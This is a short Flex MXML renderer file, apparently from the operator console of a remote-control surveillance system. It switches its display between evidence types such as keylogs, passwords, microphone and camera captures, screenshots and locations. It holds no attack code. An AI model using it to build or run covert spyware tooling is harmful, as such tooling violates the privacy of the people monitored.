<?xml version="1.0" encoding="utf-8"?>
<s:GridItemRenderer xmlns:fx="http://ns.adobe.com/mxml/2009" 
                    xmlns:s="library://ns.adobe.com/flex/spark" 
                    xmlns:mx="library://ns.adobe.com/flex/mx" clipAndEnableScrolling="true"
					xmlns:renderers="it.ht.rcs.console.operations.view.evidences.renderers.*"
					>
  
  <fx:Script>
    <![CDATA[
      import it.ht.rcs.console.evidence.model.EvidenceData;
      override public function prepare(hasBeenRecycled:Boolean):void {
        if (!data)
          return;
		
			currentState=data.type;
  
      	}
    ]]>
  </fx:Script>
	<s:states>
		<s:State name="device"/>
		<s:State name="chat"/>
		<s:State name="clipboard"/>
		<s:State name="camera"/>
		<s:State name="file"/>
		<s:State name="keylog"/>
		<s:State name="mic"/>
		<s:State name="password"/>
		<s:State name="print"/>
		<s:State name="screenshot"/>
		<s:State name="url"/>
		<s:State name="call"/>
		<s:State name="message"/>
		<s:State name="position"/>
		<s:State name="calendar"/>
		<s:State name="addressbook"/>
		<s:State name="mouse"/>
		<s:State name="application"/>
	</s:states>
  
	<renderers:Screenshot includeIn="screenshot"/>
	<renderers:EvidenceDataRenderer excludeFrom="screenshot"/>
	
  
</s:GridItemRenderer>
